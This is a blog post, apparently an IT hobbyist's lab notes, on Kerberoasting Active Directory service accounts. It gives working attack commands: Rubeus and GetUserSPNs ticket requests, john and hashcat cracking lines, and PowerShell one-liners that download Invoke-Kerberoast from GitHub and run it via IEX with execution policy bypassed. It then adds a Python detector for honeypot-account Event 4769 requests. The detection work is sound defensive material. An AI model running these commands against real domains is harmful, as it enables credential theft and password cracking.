Kerberoasting Over an Open Fire

  • RSAT (nice to have, but not absolutely necessary)
  • BloodHound (also nice to have, but not absolutely necessary)
  • Redistributable 3.5
  • Visual Studio 2019 Community
  • Rubeus
  • John the Ripper
Set-ADUser -Identity Kerberoast.Honeypot -ServicePrincipalNames @{Add='MySVC/corp.local'}
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerb-Hash0.txt"
$webreq = [System.Net.WebRequest]::Create('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); $resp = $webreq.GetResponse(); $respstream = $resp.GetResponseStream(); $reader = [System.IO.StreamReader]::new($respstream); $content = $reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerb-Hash0.txt
Windows Defender does its job.
.\Rubeus.exe kerberoast /format:hashcat > Hash1
Windows Defender does its job again.
./GetUserSPNs.py -request <domain>/<user> -dc-ip <IP> -outputfile <filename>
john <filename> --format=krb5tgs --wordlist=<wordlist>
hashcat -m 13100 hashes.kerberoast rockyou.txt -force
hashcat -m 19700 hashes.kerberoast2 rockyou.txt -force
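The honeypot account set up above (Kerberoast.Honeypot, SPN MySVC/corp.local) only pays off if someone watches for service ticket requests against it. The script below is an added example, not code from the original post: it parses a few constructed, simplified key=value renderings of Event ID 4769 (a Kerberos service ticket request) and flags any request whose Service Name is the honeypot account. Since no real service uses that account, every such request is suspicious; requests with an RC4 ticket encryption type (0x17) are ranked higher because the roasting tools listed on this page request RC4 so the result cracks under hashcat -m 13100, while an AES256 ticket (the -m 19700 case) is still flagged, just at a lower severity. The event field names and log format here are assumptions made for the example, not the exact Windows XML schema.

```python
# Added example (not from the original post): flag Kerberos TGS requests (Event ID 4769)
# for the honeypot account created with Set-ADUser. The log format, field names and
# sample events below are constructed for illustration.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

HONEYPOT_ACCOUNT = "Kerberoast.Honeypot"   # account name from the page's Set-ADUser step

# Ticket encryption types as they appear in 4769. RC4 (0x17) and DES (0x1, 0x3) are the
# ones roasting tools ask for so the hash is cheap to crack; 0x12 is AES256.
WEAK_ETYPES = {0x17, 0x18, 0x1, 0x3}
AES256 = 0x12


@dataclass
class TgsRequest:
    client: str       # requesting account (Account Name)
    service: str      # account backing the service (Service Name)
    etype: int        # Ticket Encryption Type
    source_ip: str    # Client Address


# Constructed sample log: one simplified 4768/4769 event per line.
SAMPLE_EVENTS = """
EventID=4769 AccountName=alice@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.5
EventID=4769 AccountName=alice@CORP.LOCAL ServiceName=Kerberoast.Honeypot TicketEncryptionType=0x17 IpAddress=10.0.0.77
EventID=4768 AccountName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.8
EventID=4769 AccountName=svc_backup@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.0.0.9
EventID=4769 AccountName=bob@CORP.LOCAL ServiceName=Kerberoast.Honeypot TicketEncryptionType=0x12 IpAddress=10.0.0.8
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Optional[TgsRequest]:
    """Parse one key=value line; return None for anything that is not a 4769."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get("EventID") != "4769":
        return None
    return TgsRequest(
        client=fields["AccountName"],
        service=fields["ServiceName"],
        etype=int(fields["TicketEncryptionType"], 16),
        source_ip=fields["IpAddress"],
    )


def find_honeypot_hits(log_text: str) -> List[Tuple[str, str, int, str]]:
    """Return (client, source_ip, etype, severity) for every TGS request that names
    the honeypot account. Any hit is a finding; RC4/DES requests are rated high."""
    hits = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        if ev.service.lower() != HONEYPOT_ACCOUNT.lower():
            continue
        severity = "high" if ev.etype in WEAK_ETYPES else "medium"
        hits.append((ev.client, ev.source_ip, ev.etype, severity))
    return hits


def summarize(hits: List[Tuple[str, str, int, str]]) -> List[str]:
    """Human-readable lines for a ticket or alert."""
    return [
        f"{severity.upper()}: {client} from {ip} requested a ticket for "
        f"{HONEYPOT_ACCOUNT} with etype 0x{etype:x}"
        for client, ip, etype, severity in hits
    ]


if __name__ == "__main__":
    for line in summarize(find_honeypot_hits(SAMPLE_EVENTS)):
        print(line)
```

On a real domain controller the same logic runs over Get-WinEvent output filtered on Event ID 4769; the decision rule stays the same: the honeypot's Service Name should never appear in a 4769 at all, so the encryption type only changes how loudly to shout, not whether to alert.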

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.